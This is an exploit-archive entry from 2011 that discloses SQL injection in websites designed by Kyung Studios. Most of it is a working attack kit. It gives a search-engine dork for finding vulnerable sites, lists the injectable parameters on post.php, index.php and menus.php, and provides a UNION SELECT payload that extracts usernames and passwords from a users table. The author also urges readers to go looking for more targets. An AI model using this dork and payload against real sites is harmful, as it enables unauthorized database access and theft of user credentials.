Kyung Studios WebDesigners Database Disclosure vulnerability

🗓️ 18 Apr 2011 00:00:00Reported by ^Xecuti0N3rType

zdt🔗 0day.today👁 14 Views

Kyung Studios WebDesigners Database Disclosure vulnerability, SQL injection in web apps, POC for site.com/post.ph

#(+)Exploit Title: Kyung Studios WebDesigners Database Disclosure vulnerability
#(+)Author   : ^Xecuti0n3r
#(+) E-mail  : xecuti0n3r()yahoo.com
#(+) dork    : intext:"Site Design by Kyung Studios"
#(+) Category  : Web Apps [SQli]

____________________________________________________________________
____________________________________________________________________

Choose any site that comes up when you enter the dork intext:"Site Design by Kyung Studios" in search engine


    *SQL injection Vulnerability*
	

#	[+]http://site.com/post.php?id='17
#	[+]http://site.com/post.php?id=[SQLi]


#	[+]http://site.com/index.php?page='ex_upcoming
#	[+]http://site.com/index.php?page=[SQLi]


#	[+]http://site.com/menus.php?menu='horsdoeuvres
#	[+]http://site.com/menus.php?menu=[SQLi]


POC : http://www.site.com/post.php?id=1+union+select+1,concat(username,0x3a,password),3,4,5,6+from+users


Well there are a lot more .. just use the dork filetype:php ;) .. 

____________________________________________________________________
____________________________________________________________________

########################################################################
(+)Exploit Coded by: ^Xecuti0n3r 
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
########################################################################



#  0day.today [2018-01-08]  #

18 Apr 2011 00:00Current

7.1High risk

Vulners AI Score7.1